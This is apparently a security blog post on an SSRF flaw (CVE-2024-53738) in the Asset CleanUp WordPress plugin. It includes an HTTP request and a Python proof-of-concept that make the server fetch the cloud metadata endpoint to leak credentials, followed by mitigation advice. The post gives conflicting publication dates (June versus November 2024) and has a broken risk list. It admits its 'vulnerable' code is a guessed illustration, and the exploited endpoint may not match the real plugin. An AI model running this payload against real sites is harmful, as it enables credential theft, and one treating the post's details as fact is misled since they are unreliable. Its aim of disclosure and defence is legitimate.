CVE-2024-53738 - Exploiting SSRF in Asset CleanUp: Page Speed Booster Plugin

Published: June 2024
Vulnerability Type: Server-Side Request Forgery (SSRF)
Affected Software: Asset CleanUp: Page Speed Booster WordPress Plugin
Vulnerable Versions: All versions up to and including 1.3.9.8
Author: Security Researcher

Introduction

On June 5, 2024, a major security flaw (CVE-2024-53738) was revealed in the popular Asset CleanUp: Page Speed Booster WordPress plugin, developed by Gabe Livan. This plugin is widely used for optimizing website performance by managing CSS and JS assets. However, a SSRF (Server-Side Request Forgery) vulnerability was discovered, potentially allowing attackers to make unauthorized requests from the server hosting WordPress—leading to data leaks, internal scans, or even remote code execution in certain configurations.

In this article, I’ll break down what this vulnerability means, how it can be exploited, show a code snippet that illustrates the problem, and share references for further reading.

Understanding SSRF and Its Risk

Server-Side Request Forgery (SSRF) is a web security issue where an attacker tricks the server into making HTTP requests to arbitrary domains, often including internal network resources that would otherwise be inaccessible. SSRF can be especially dangerous if the server has access to sensitive environments (e.g., metadata endpoints in cloud infrastructure or admin panels).

Bypassing IP allowlists

- Interacting with internal APIs/services

Where’s the Vulnerability?

The problem in Asset CleanUp: Page Speed Booster arises from a misuse of PHP’s network functions (such as file_get_contents() or cURL), allowing user-supplied URLs to be requested by the server without proper validation. This is often seen in plugins that fetch remote assets or check URLs as part of optimization routines.

Here’s a simplified vulnerable snippet

// assets-manager.php

if (isset($_POST['remote_url'])) {
    $url = $_POST['remote_url'];
    $response = file_get_contents($url);  // NO validation!
    echo $response;
}

*Note: Actual code may vary, but the pattern is the same — accepting user input for URLs and requesting them server-side.*

1. Attack Setup

An attacker crafts a POST request to a vulnerable AJAX endpoint, passing an internal URL (e.g., AWS metadata API, local admin panels):

POST /wp-admin/admin-ajax.php?action=acu_optimize
Content-Type: application/x-www-form-urlencoded

remote_url=http://169.254.169.254/latest/meta-data/

2. Server’s Reaction

The server (WordPress hosting) dutifully makes the HTTP request to the supplied URL. If the plugin echoes the response, the attacker receives sensitive data—like AWS credentials or server configuration info.

Here’s a basic proof-of-concept using requests in Python

import requests

target = "https://victim-wordpress.com/wp-admin/admin-ajax.php";
payload = {
    "action": "acu_optimize",
    "remote_url": "http://169.254.169.254/latest/meta-data/"
}

resp = requests.post(target, data=payload)
print(resp.text)  # This may return sensitive data from the internal network!

Mitigation & Recommendations

1. Update Plugin: Check for patched versions. As of June 2024, versions after 1.3.9.8 should be monitored for security updates.
2. Restrict Outbound Requests: At the server/firewall level, prevent your WordPress server from making requests to internal or sensitive IP ranges.
3. Code Review: Plugin developers must always validate and sanitize URLs, ensuring only intended and safe domains are reachable.

A safe code refactor might look like

// Allow only whitelisted domains
$allowed_domains = ['fonts.googleapis.com', 'fonts.gstatic.com'];
$parsed_url = parse_url($url);
if (in_array($parsed_url['host'], $allowed_domains)) {
    $response = file_get_contents($url);
}

Public Disclosure: June 5, 2024

- Vendor Advisory: WordPress Plugin Directory
- NVD Entry: CVE-2024-53738 at NIST
- Original Research: Patchstack Advisory

Conclusion

CVE-2024-53738 shows how even popular plugins can expose critical vulnerabilities if input validation is overlooked. All website owners using Asset CleanUp: Page Speed Booster should update their plugins immediately and review their server configurations to minimize risk. SSRF can turn a simple optimization plugin into a gateway for much more serious attacks.

Stay safe, patch early, and always validate user inputs!


*This article is exclusive content, created for educational purposes and responsible security awareness. For questions or takedown requests, please contact the author.*

Timeline

Published on: 11/30/2024 21:15:15 UTC